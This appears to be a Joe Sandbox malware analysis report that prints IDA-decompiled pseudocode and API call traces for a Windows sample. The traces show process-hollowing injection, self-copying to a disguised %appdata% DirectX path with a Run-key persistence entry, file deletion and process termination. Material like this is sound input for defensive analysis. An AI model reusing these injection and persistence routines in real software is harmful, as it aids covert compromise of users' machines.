    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_8_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 100%
    			E0040AC28() {
    				intOrPtr* _t5;
    				intOrPtr* _t6;
    				intOrPtr* _t7;
    				intOrPtr* _t8;
    				intOrPtr* _t9;
    				intOrPtr _t12;
    				intOrPtr _t13;
    				intOrPtr _t16;
    				intOrPtr* _t17;
    				intOrPtr* _t18;
    
    				_t12 =  *0x452f70; // 0x405e70
    				 *0x45478c = E0040A628(_t12, 1);
    				_t13 =  *0x453040; // 0x405ef0
    				 *0x454790 = E0040A628(_t13, 1);
    				_t5 =  *0x452f34; // 0x454008
    				 *_t5 = 0x40a7a4;
    				_t6 =  *0x452fa8; // 0x454004
    				 *_t6 = E0040AC18;
    				_t7 =  *0x452f64; // 0x45401c
    				_t16 =  *0x406188; // 0x4061d4
    				 *_t7 = _t16;
    				_t8 =  *0x452f98; // 0x45400c
    				 *_t8 = E0040A968;
    				_t9 =  *0x452fac; // 0x454010
    				 *_t9 = E0040AB4C;
    				_t17 =  *0x453054; // 0x454020
    				 *_t17 = E0040A8B4;
    				_t18 =  *0x452f24; // 0x454028
    				 *_t18 = E0040A8D0;
    				return E0040A8D0;
    			}













    Strings
    Memory Dump Source
    • Source File: 00000008.00000002.1492263131.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_8_2_400000_obtG43AWHP.jbxd

    Executed Functions

    APIs
    • VirtualAlloc.KERNELBASE(00000000,00002800,00001000,00000004), ref: 0028E0C6
    • GetModuleFileNameA.KERNELBASE(00000000,?,00002800), ref: 0028E0DC
    • CreateProcessA.KERNEL32(?,00000000), ref: 0028E1C2
    • VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 0028E1F0
    • ReadProcessMemory.KERNELBASE(00000000,?,?,00000004,00000000), ref: 0028E235
    • VirtualAllocEx.KERNELBASE(00000000,?,?,00003000,00000040), ref: 0028E271
    • NtWriteVirtualMemory.NTDLL(00000000,?,?,00000000,00000000), ref: 0028E297
    • NtWriteVirtualMemory.NTDLL(00000000,00000000,?,00000002,00000000), ref: 0028E306
    • WriteProcessMemory.KERNELBASE(00000000,?,?,00000004,00000000), ref: 0028E32C
    • SetThreadContext.KERNEL32(00000000,?), ref: 0028E34E
    • ResumeThread.KERNELBASE(00000000), ref: 0028E35A
    Memory Dump Source
    • Source File: 00000009.00000002.1500598486.0028D000.00000040.sdmp, Offset: 0028D000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_9_2_28d000_obtG43AWHP.jbxd
    APIs
    • CreateWindowExA.USER32(00000200,saodkfnosa9uin,mfoaskdfnoa,00CF0000,80000000,80000000,000003E8,000003E8,00000000,00000000,00000000,00000000), ref: 0028E493
    • PostMessageA.USER32(00000000,00000400,00000064,000001F4), ref: 0028E4B6
      • Part of subcall function 0028E080: VirtualAlloc.KERNELBASE(00000000,00002800,00001000,00000004), ref: 0028E0C6
      • Part of subcall function 0028E080: GetModuleFileNameA.KERNELBASE(00000000,?,00002800), ref: 0028E0DC
      • Part of subcall function 0028E080: CreateProcessA.KERNEL32(?,00000000), ref: 0028E1C2
      • Part of subcall function 0028E080: VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 0028E1F0
    Strings
    Memory Dump Source
    • Source File: 00000009.00000002.1500598486.0028D000.00000040.sdmp, Offset: 0028D000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_9_2_28d000_obtG43AWHP.jbxd
    APIs
    • GetFileAttributesA.KERNELBASE(apfHQ), ref: 0028E54C
      • Part of subcall function 0028E380: CreateWindowExA.USER32(00000200,saodkfnosa9uin,mfoaskdfnoa,00CF0000,80000000,80000000,000003E8,000003E8,00000000,00000000,00000000,00000000), ref: 0028E493
      • Part of subcall function 0028E380: PostMessageA.USER32(00000000,00000400,00000064,000001F4), ref: 0028E4B6
    Strings
    Memory Dump Source
    • Source File: 00000009.00000002.1500598486.0028D000.00000040.sdmp, Offset: 0028D000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_9_2_28d000_obtG43AWHP.jbxd

    Non-executed Functions

    Memory Dump Source
    • Source File: 00000009.00000002.1500598486.0028D000.00000040.sdmp, Offset: 0028D000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_9_2_28d000_obtG43AWHP.jbxd

    Executed Functions

    C-Code - Quality: 65%
    			E00404FC0(intOrPtr __eax) {
    				intOrPtr _v8;
    				void* _v12;
    				char _v15;
    				char _v17;
    				char _v18;
    				char _v22;
    				int _v28;
    				char _v289;
    				long _t44;
    				long _t61;
    				long _t63;
    				CHAR* _t70;
    				CHAR* _t72;
    				struct HINSTANCE__* _t78;
    				struct HINSTANCE__* _t84;
    				char* _t94;
    				void* _t95;
    				intOrPtr _t99;
    				struct HINSTANCE__* _t107;
    				void* _t110;
    				void* _t112;
    				intOrPtr _t113;
    
    				_t110 = _t112;
    				_t113 = _t112 + 0xfffffee0;
    				_v8 = __eax;
    				GetModuleFileNameA(0,  &_v289, 0x105);
    				_v22 = 0;
    				_t44 = RegOpenKeyExA(0x80000001, "Software\\Borland\\Locales", 0, 0xf0019,  &_v12); // executed
    				if(_t44 == 0) {
    					L3:
    					_push(_t110);
    					_push(0x4050c5);
    					_push( *[fs:eax]);
    					 *[fs:eax] = _t113;
    					_v28 = 5;
    					E00404E08( &_v289, 0x105);
    					if(RegQueryValueExA(_v12,  &_v289, 0, 0,  &_v22,  &_v28) != 0 && RegQueryValueExA(_v12, E0040522C, 0, 0,  &_v22,  &_v28) != 0) {
    						_v22 = 0;
    					}
    					_v18 = 0;
    					_pop(_t99);
    					 *[fs:eax] = _t99;
    					_push(E004050CC);
    					return RegCloseKey(_v12);
    				} else {
    					_t61 = RegOpenKeyExA(0x80000002, "Software\\Borland\\Locales", 0, 0xf0019,  &_v12); // executed
    					if(_t61 == 0) {
    						goto L3;
    					} else {
    						_t63 = RegOpenKeyExA(0x80000001, "Software\\Borland\\Delphi\\Locales", 0, 0xf0019,  &_v12); // executed
    						if(_t63 != 0) {
    							_push(0x105);
    							_push(_v8);
    							_push( &_v289);
    							L00401248();
    							GetLocaleInfoA(GetThreadLocale(), 3,  &_v17, 5); // executed
    							_t107 = 0;
    							if(_v289 != 0 && (_v17 != 0 || _v22 != 0)) {
    								_t70 =  &_v289;
    								_push(_t70);
    								L00401250();
    								_t94 = _t70 +  &_v289;
    								while( *_t94 != 0x2e && _t94 !=  &_v289) {
    									_t94 = _t94 - 1;
    								}
    								_t72 =  &_v289;
    								if(_t94 != _t72) {
    									_t95 = _t94 + 1;
    									if(_v22 != 0) {
    										_push(0x105 - _t95 - _t72);
    										_push( &_v22);
    										_push(_t95);
    										L00401248();
    										_t107 = LoadLibraryExA( &_v289, 0, 2);
    									}
    									if(_t107 == 0 && _v17 != 0) {
    										_push(0x105 - _t95 -  &_v289);
    										_push( &_v17);
    										_push(_t95);
    										L00401248();
    										_t78 = LoadLibraryExA( &_v289, 0, 2); // executed
    										_t107 = _t78;
    										if(_t107 == 0) {
    											_v15 = 0;
    											_push(0x105 - _t95 -  &_v289);
    											_push( &_v17);
    											_push(_t95);
    											L00401248();
    											_t84 = LoadLibraryExA( &_v289, 0, 2); // executed
    											_t107 = _t84;
    										}
    									}
    								}
    							}
    							return _t107;
    						} else {
    							goto L3;
    						}
    					}
    				}
    			}

























    APIs
    • GetModuleFileNameA.KERNEL32(00000000,?,00000105,0000000B,00000000), ref: 00404FDC
    • RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,0000000B,00000000), ref: 00404FFA
    • RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,0000000B,00000000), ref: 00405018
    • RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 00405036
      • Part of subcall function 00404E08: GetModuleHandleA.KERNEL32(kernel32.dll,004067D8,0000000B,00000000,?,00405068,00000000,004050C5,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 00404E25
      • Part of subcall function 00404E08: GetProcAddress.KERNEL32(00000000,GetLongPathNameA,kernel32.dll,004067D8,0000000B,00000000,?,00405068,00000000,004050C5,?,80000001,Software\Borland\Locales,00000000,000F0019,?), ref: 00404E36
      • Part of subcall function 00404E08: lstrcpyn.KERNEL32(?,?,?,?,00405068,00000000,004050C5,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 00404E66
      • Part of subcall function 00404E08: lstrcpyn.KERNEL32(?,?,?,kernel32.dll,004067D8,0000000B,00000000,?,00405068,00000000,004050C5,?,80000001,Software\Borland\Locales,00000000,000F0019), ref: 00404ECA
      • Part of subcall function 00404E08: lstrcpyn.KERNEL32(?,?,00000001,?,?,?,kernel32.dll,004067D8,0000000B,00000000,?,00405068,00000000,004050C5,?,80000001), ref: 00404EFF
      • Part of subcall function 00404E08: FindFirstFileA.KERNEL32(?,?,?,?,00000001,?,?,?,kernel32.dll,004067D8,0000000B,00000000,?,00405068,00000000,004050C5), ref: 00404F12
      • Part of subcall function 00404E08: FindClose.KERNEL32(00000000,?,?,?,?,00000001,?,?,?,kernel32.dll,004067D8,0000000B,00000000,?,00405068,00000000), ref: 00404F1F
      • Part of subcall function 00404E08: lstrlen.KERNEL32(?,00000000,?,?,?,?,00000001,?,?,?,kernel32.dll,004067D8,0000000B,00000000,?,00405068), ref: 00404F2B
      • Part of subcall function 00404E08: lstrcpyn.KERNEL32(0000005D,?,00000104,?,00000000,?,?,?,?,00000001,?,?,?,kernel32.dll,004067D8,0000000B), ref: 00404F5F
      • Part of subcall function 00404E08: lstrlen.KERNEL32(?,0000005D,?,00000104,?,00000000,?,?,?,?,00000001,?,?,?,kernel32.dll,004067D8), ref: 00404F6B
      • Part of subcall function 00404E08: lstrcpyn.KERNEL32(?,0000005C,?,?,0000005D,?,00000104,?,00000000,?,?,?,?,00000001,?,?), ref: 00404F8D
    • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?,00000000,004050C5,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 0040507F
    • RegQueryValueExA.ADVAPI32(?,0040522C,00000000,00000000,?,?,?,?,00000000,00000000,?,?,00000000,004050C5,?,80000001), ref: 0040509D
    • RegCloseKey.ADVAPI32(?,004050CC,00000000,?,?,00000000,004050C5,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 004050BF
    • lstrcpyn.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 004050DC
    • GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 004050E9
    • GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 004050EF
    • lstrlen.KERNEL32(?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 0040511A
    • lstrcpyn.KERNEL32(00000000,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 00405161
    • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000000,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 00405171
    • lstrcpyn.KERNEL32(00000000,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 00405199
    • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000000,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 004051A9
    • lstrcpyn.KERNEL32(00000000,?,00000105,?,00000000,00000002,00000000,?,00000105,?,00000000,00000003,?,00000005,?,?), ref: 004051CF
    • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000000,?,00000105,?,00000000,00000002,00000000,?,00000105,?,00000000,00000003,?), ref: 004051DF
    Strings
    Memory Dump Source
    • Source File: 0000000A.00000002.1501156262.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_10_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 61%
    			E004050CC() {
    				void* _t28;
    				void* _t30;
    				struct HINSTANCE__* _t36;
    				struct HINSTANCE__* _t42;
    				char* _t51;
    				void* _t52;
    				struct HINSTANCE__* _t59;
    				void* _t61;
    
    				_push(0x105);
    				_push( *((intOrPtr*)(_t61 - 4)));
    				_push(_t61 - 0x11d);
    				L00401248();
    				GetLocaleInfoA(GetThreadLocale(), 3, _t61 - 0xd, 5); // executed
    				_t59 = 0;
    				if( *(_t61 - 0x11d) == 0 ||  *(_t61 - 0xd) == 0 &&  *((char*)(_t61 - 0x12)) == 0) {
    					L14:
    					return _t59;
    				} else {
    					_t28 = _t61 - 0x11d;
    					_push(_t28);
    					L00401250();
    					_t51 = _t28 + _t61 - 0x11d;
    					L5:
    					if( *_t51 != 0x2e && _t51 != _t61 - 0x11d) {
    						_t51 = _t51 - 1;
    						goto L5;
    					}
    					_t30 = _t61 - 0x11d;
    					if(_t51 != _t30) {
    						_t52 = _t51 + 1;
    						if( *((char*)(_t61 - 0x12)) != 0) {
    							_push(0x105 - _t52 - _t30);
    							_push(_t61 - 0x12);
    							_push(_t52);
    							L00401248();
    							_t59 = LoadLibraryExA(_t61 - 0x11d, 0, 2);
    						}
    						if(_t59 == 0 &&  *(_t61 - 0xd) != 0) {
    							_push(0x105 - _t52 - _t61 - 0x11d);
    							_push(_t61 - 0xd);
    							_push(_t52);
    							L00401248();
    							_t36 = LoadLibraryExA(_t61 - 0x11d, 0, 2); // executed
    							_t59 = _t36;
    							if(_t59 == 0) {
    								 *((char*)(_t61 - 0xb)) = 0;
    								_push(0x105 - _t52 - _t61 - 0x11d);
    								_push(_t61 - 0xd);
    								_push(_t52);
    								L00401248();
    								_t42 = LoadLibraryExA(_t61 - 0x11d, 0, 2); // executed
    								_t59 = _t42;
    							}
    						}
    					}
    					goto L14;
    				}
    			}












    APIs
    • lstrcpyn.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 004050DC
    • GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 004050E9
    • GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 004050EF
    • lstrlen.KERNEL32(?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 0040511A
    • lstrcpyn.KERNEL32(00000000,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 00405161
    • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000000,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 00405171
    • lstrcpyn.KERNEL32(00000000,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 00405199
    • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000000,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 004051A9
    • lstrcpyn.KERNEL32(00000000,?,00000105,?,00000000,00000002,00000000,?,00000105,?,00000000,00000003,?,00000005,?,?), ref: 004051CF
    • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000000,?,00000105,?,00000000,00000002,00000000,?,00000105,?,00000000,00000003,?), ref: 004051DF
    Strings
    Memory Dump Source
    • Source File: 0000000A.00000002.1501156262.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_10_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 33%
    			E00418750(void* __ebx, void* __edi, void* __esi) {
    				char _v8;
    				char _v12;
    				char _v16;
    				char _v20;
    				char _v24;
    				char _v28;
    				char _v32;
    				char _v36;
    				char _v40;
    				char _v44;
    				intOrPtr _v48;
    				char _v52;
    				int _v56;
    				char _v60;
    				char _v64;
    				char _v68;
    				char _v72;
    				char* _t52;
    				void* _t80;
    				char* _t87;
    				char* _t99;
    				void* _t109;
    				void* _t110;
    				intOrPtr _t116;
    				intOrPtr _t117;
    				void* _t125;
    				intOrPtr _t139;
    				intOrPtr _t140;
    
    				_t137 = __esi;
    				_t136 = __edi;
    				_t139 = _t140;
    				_t110 = 8;
    				do {
    					_push(0);
    					_push(0);
    					_t110 = _t110 - 1;
    				} while (_t110 != 0);
    				_push(_t110);
    				_push(__ebx);
    				_push(__esi);
    				_push(__edi);
    				_push(_t139);
    				_push(0x418974);
    				_push( *[fs:eax]);
    				 *[fs:eax] = _t140;
    				if(E00402944(__ebx, __esi) == 0) {
    					E004029A4(0,  &_v12);
    					ShellExecuteA(0, 0, E00404348(_v12), 0x418984, 0, 0);
    					E00403D1C();
    				}
    				_push(_t139);
    				_push(0x418925);
    				_push( *[fs:eax]);
    				 *[fs:eax] = _t140;
    				E004029A4(1,  &_v16);
    				_t109 = E00407138(_v16, 0);
    				_t144 = _t109 - 0x10;
    				if(_t109 == 0x10) {
    					E00417D84("%appdata%\\Microsoft\\DirectX\\nthost.exe", _t109, _t110,  &_v8, _t136, _t137, _t144);
    					E004186D0(_v8, _t109, _t110, _t144);
    					E00406EFC("%appdata%\\Microsoft\\DirectX\\nthost.exe",  &_v24);
    					E00417D84(_v24, _t109, _t110,  &_v20, _t136, _t137, _t144);
    					_push(_v20);
    					E00406EFC("DX9 C++RTL",  &_v28);
    					_pop(_t125);
    					E004185E8(_v28, _t109, _t125);
    					E004029A4(0,  &_v36);
    					E00406EFC(_v36,  &_v32);
    					_push(_v32);
    					E00406EFC("%appdata%\\Microsoft\\DirectX\\nthost.exe",  &_v44);
    					E00417D84(_v44, _t109, _t110,  &_v40, _t136, _t137, 0);
    					_pop(_t80);
    					E00404294(_t80, _v40);
    					if(0 == 0) {
    						__eflags = 1;
    						E00406FFC( &_v60);
    						_t87 = E00404348(_v60);
    						ShellExecuteA(0, 0, E00404348(_v8), _t87, 0, 1);
    					} else {
    						_push(1);
    						_push(0);
    						E00406FFC( &_v52);
    						_push(_v52);
    						_push(" DEL \"");
    						E004029A4(0,  &_v56);
    						E00404208();
    						_t99 = E00404348(_v48);
    						ShellExecuteA(0, 0, E00404348(_v8), _t99, E004189E4, _v56);
    					}
    					E00403D1C();
    				}
    				if(_t109 < 0x20) {
    					E00406FFC( &_v64);
    					_t52 = E00404348(_v64);
    					E004029A4(0,  &_v68);
    					ShellExecuteA(0, 0, E00404348(_v68), _t52, 0, 1); // executed
    					E00403D1C();
    				}
    				_pop(_t116);
    				 *[fs:eax] = _t116;
    				_pop(_t117);
    				 *[fs:eax] = _t117;
    				_push(E0041897B);
    				return E00403EAC( &_v72, 0x11);
    			}
































    APIs
      • Part of subcall function 00402944: GetCommandLineA.KERNEL32(00000000,00402995,?,?,?,00000000,?,00418CB4,00000000,00418D4A,?,00000000,00418D7B), ref: 0040295B
    • ShellExecuteA.SHELL32(00000000,00000000,00000000,00418984,00000000,00000000), ref: 0041879A
      • Part of subcall function 004029A4: GetModuleFileNameA.KERNEL32(00000000,?,00000105,?,?,?,004187BF,00000000,00418925,?,00000000,00418974), ref: 004029C8
      • Part of subcall function 004029A4: GetCommandLineA.KERNEL32(?,?,?,004187BF,00000000,00418925,?,00000000,00418974,?,?,?,?,00000007,00000000,00000000), ref: 004029DA
    • ShellExecuteA.SHELL32(00000000,00000000,00000000,00000000,004189E4,00000000), ref: 004188A3
    • ShellExecuteA.SHELL32(00000000,00000000,00000000,00000000,00000000,00000001), ref: 004188D1
    • ShellExecuteA.SHELL32(00000000,00000000,00000000,00000000,00000000,00000001), ref: 00418911
      • Part of subcall function 00403D1C: FreeLibrary.KERNEL32(00400000,00000000,00000000,?,00000002,00403DFE,0040272B,00402773,00000000,00000000,004026A8,?,?,00000000,?,00402968), ref: 00403DA1
      • Part of subcall function 00403D1C: ExitProcess.KERNEL32(00000000,?,00000002,00403DFE,0040272B,00402773,00000000,00000000,004026A8,?,?,00000000,?,00402968,00000000,00402995), ref: 00403DD6
      • Part of subcall function 00417D84: ExpandEnvironmentStringsA.KERNEL32(00000000,00000000,00000000,00000000,00417DFA,?,?,?,00000000,00000000,?,004187DF,00000000,00418925,?,00000000), ref: 00417DAA
      • Part of subcall function 00417D84: ExpandEnvironmentStringsA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00417DFA,?,?,?,00000000,00000000,?,004187DF,00000000), ref: 00417DCB
      • Part of subcall function 004186D0: CopyFileA.KERNEL32(00000000,00000000,00000000), ref: 00418723
      • Part of subcall function 004185E8: RegOpenKeyExA.ADVAPI32(80000001,software\microsoft\windows\currentversion\run,00000000,000F003F,?,00000000,00418692,?,00000000), ref: 0041862D
      • Part of subcall function 004185E8: RegSetValueExA.ADVAPI32(?,00000000,00000000,00000001,00000000,00000000,80000001,software\microsoft\windows\currentversion\run,00000000,000F003F,?,00000000,00418692,?,00000000), ref: 00418661
      • Part of subcall function 004185E8: RegCloseKey.ADVAPI32(?,?,00000000,00000000,00000001,00000000,00000000,80000001,software\microsoft\windows\currentversion\run,00000000,000F003F,?,00000000,00418692,?,00000000), ref: 0041866A
    Strings
    Memory Dump Source
    • Source File: 0000000A.00000002.1501156262.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_10_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 68%
    			E004019B0() {
    				void* _t11;
    				signed int _t13;
    				intOrPtr _t19;
    				void* _t20;
    				intOrPtr _t23;
    
    				_push(_t23);
    				_push(E00401A66);
    				_push( *[fs:edx]);
    				 *[fs:edx] = _t23;
    				_push(0x4545c4);
    				L00401304();
    				if( *0x454045 != 0) {
    					_push(0x4545c4);
    					L0040130C();
    				}
    				E00401374(0x4545e4);
    				E00401374(0x4545f4);
    				E00401374(0x454620);
    				_t11 = LocalAlloc(0, 0xff8); // executed
    				 *0x45461c = _t11;
    				if( *0x45461c != 0) {
    					_t13 = 3;
    					do {
    						_t20 =  *0x45461c; // 0x0
    						 *((intOrPtr*)(_t20 + _t13 * 4 - 0xc)) = 0;
    						_t13 = _t13 + 1;
    					} while (_t13 != 0x401);
    					 *((intOrPtr*)(0x454608)) = 0x454604;
    					 *0x454604 = 0x454604;
    					 *0x454610 = 0x454604;
    					 *0x4545bc = 1;
    				}
    				_pop(_t19);
    				 *[fs:eax] = _t19;
    				_push(E00401A6D);
    				if( *0x454045 != 0) {
    					_push(0x4545c4);
    					L00401314();
    					return 0;
    				}
    				return 0;
    			}









    APIs
    • RtlInitializeCriticalSection.KERNEL32(004545C4,00000000,00401A66,?,?,0040224A,00454604,00000000,00000000,?,?,00401C39,00401C4E,00401D9F), ref: 004019C6
    • RtlEnterCriticalSection.KERNEL32(004545C4,004545C4,00000000,00401A66,?,?,0040224A,00454604,00000000,00000000,?,?,00401C39,00401C4E,00401D9F), ref: 004019D9
    • LocalAlloc.KERNEL32(00000000,00000FF8,004545C4,00000000,00401A66,?,?,0040224A,00454604,00000000,00000000,?,?,00401C39,00401C4E,00401D9F), ref: 00401A03
    • RtlLeaveCriticalSection.KERNEL32(004545C4,00401A6D,00000000,00401A66,?,?,0040224A,00454604,00000000,00000000,?,?,00401C39,00401C4E,00401D9F), ref: 00401A60
    Strings
    Memory Dump Source
    • Source File: 0000000A.00000002.1501156262.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_10_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 85%
    			_entry_() {
    				char _v24;
    				char _v28;
    				void* _t17;
    				void* _t21;
    				void* _t32;
    				void* _t33;
    				void* _t38;
    				void* _t39;
    				intOrPtr _t41;
    				void* _t42;
    
    				_v28 = 0;
    				_v24 = 0;
    				E00405ADC(0x418be0);
    				_push(0x418d7b);
    				_push( *[fs:eax]);
    				 *[fs:eax] = _t41;
    				_push(_t40);
    				_push(0x418d4a);
    				_push( *[fs:edx]);
    				 *[fs:edx] = _t41;
    				_t42 = E00402944(_t32, _t39) - 2;
    				if(_t42 > 0) {
    					E004029A4(2,  &_v24);
    					E00404294(_v24, 0x418d94);
    					if(_t42 == 0) {
    						E004029A4(3,  &_v28);
    						DeleteFileA(E00404348(_v28)); // executed
    					}
    				}
    				E00418750(_t32, _t38, _t39); // executed
    				E00418A14(_t32, _t38, _t39);
    				E00418540(_t33);
    				E00418B90(_t33);
    				while(1) {
    					L4:
    					E004189E8();
    					Sleep(0x32);
    					_t17 = E00418570();
    					_t43 = _t17;
    					if(_t17 == 0) {
    						continue;
    					}
    					L5:
    					E00418590(_t43);
    					while(E00418570() != 0) {
    						E004189E8();
    						Sleep(0x32);
    					}
    					_t21 =  *0x454a64; // 0x0
    					ResumeThread(_t21);
    					do {
    						goto L4;
    					} while (_t17 == 0);
    					goto L5;
    					L4:
    					E004189E8();
    					Sleep(0x32);
    					_t17 = E00418570();
    					_t43 = _t17;
    				}
    			}














    APIs
      • Part of subcall function 00405ADC: GetModuleHandleA.KERNEL32(00000000,?,00418C93), ref: 00405AE8
      • Part of subcall function 00402944: GetCommandLineA.KERNEL32(00000000,00402995,?,?,?,00000000,?,00418CB4,00000000,00418D4A,?,00000000,00418D7B), ref: 0040295B
    • DeleteFileA.KERNEL32(00000000,00000000,00418D4A,?,00000000,00418D7B), ref: 00418CEB
      • Part of subcall function 00418750: ShellExecuteA.SHELL32(00000000,00000000,00000000,00418984,00000000,00000000), ref: 0041879A
      • Part of subcall function 00418750: ShellExecuteA.SHELL32(00000000,00000000,00000000,00000000,004189E4,00000000), ref: 004188A3
      • Part of subcall function 00418750: ShellExecuteA.SHELL32(00000000,00000000,00000000,00000000,00000000,00000001), ref: 004188D1
      • Part of subcall function 00418750: ShellExecuteA.SHELL32(00000000,00000000,00000000,00000000,00000000,00000001), ref: 00418911
      • Part of subcall function 00418A14: Sleep.KERNEL32(00002710,00000000,00418ACB,?,?,00000000,00000000,00000000,00000000,?,00418CFA,00000000,00418D4A,?,00000000,00418D7B), ref: 00418AA9
      • Part of subcall function 004189E8: PeekMessageA.USER32(00000000,00000000,00000000,00000000,00000001), ref: 004189FA
      • Part of subcall function 004189E8: TranslateMessage.USER32 ref: 00418A04
      • Part of subcall function 004189E8: DispatchMessageA.USER32 ref: 00418A0A
    • Sleep.KERNEL32(00000032,00000000,00418D4A,?,00000000,00418D7B), ref: 00418D0B
      • Part of subcall function 00418590: SuspendThread.KERNEL32(00000000,00000000,004185B9,?,?,?,?,?,00418D1E,00000032,00000000,00418D4A,?,00000000,00418D7B), ref: 004185AA
      • Part of subcall function 00418590: OpenProcess.KERNEL32(00000001,00000000,00000000,00000000,?,?,?,?,?,00418D1E,00000032,00000000,00418D4A,?,00000000,00418D7B), ref: 004185D8
      • Part of subcall function 00418590: TerminateProcess.KERNEL32(00000000,00000001,00000000,00000000,00000000,?,?,?,?,?,00418D1E,00000032,00000000,00418D4A,?,00000000), ref: 004185DE
    • Sleep.KERNEL32(00000032,00000032,00000000,00418D4A,?,00000000,00418D7B), ref: 00418D27
    • ResumeThread.KERNEL32(00000000,00000032,00000032,00000000,00418D4A,?,00000000,00418D7B), ref: 00418D3B
      • Part of subcall function 004029A4: GetModuleFileNameA.KERNEL32(00000000,?,00000105,?,?,?,004187BF,00000000,00418925,?,00000000,00418974), ref: 004029C8
      • Part of subcall function 004029A4: GetCommandLineA.KERNEL32(?,?,?,004187BF,00000000,00418925,?,00000000,00418974,?,?,?,?,00000007,00000000,00000000), ref: 004029DA
    Strings
    Memory Dump Source
    • Source File: 0000000A.00000002.1501156262.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_10_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 68%
    			E00417974(void* __eax) {
    				void* _t3;
    
    				_push(0x454880);
    				_push(0x101); // executed
    				L0040C510(); // executed
    				if(__eax != 0) {
    					_t3 = E0040A56C("WSAStartup", 1);
    					E0040386C();
    					return _t3;
    				}
    				return __eax;
    			}





    APIs
    • WSAStartup.WSOCK32(00000101,00454880), ref: 0041797E
    Strings
    Memory Dump Source
    • Source File: 0000000A.00000002.1501156262.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_10_2_400000_obtG43AWHP.jbxd
    APIs
    • RtlEnterCriticalSection.KERNEL32(004545C4,00000000,00402218), ref: 004020E7
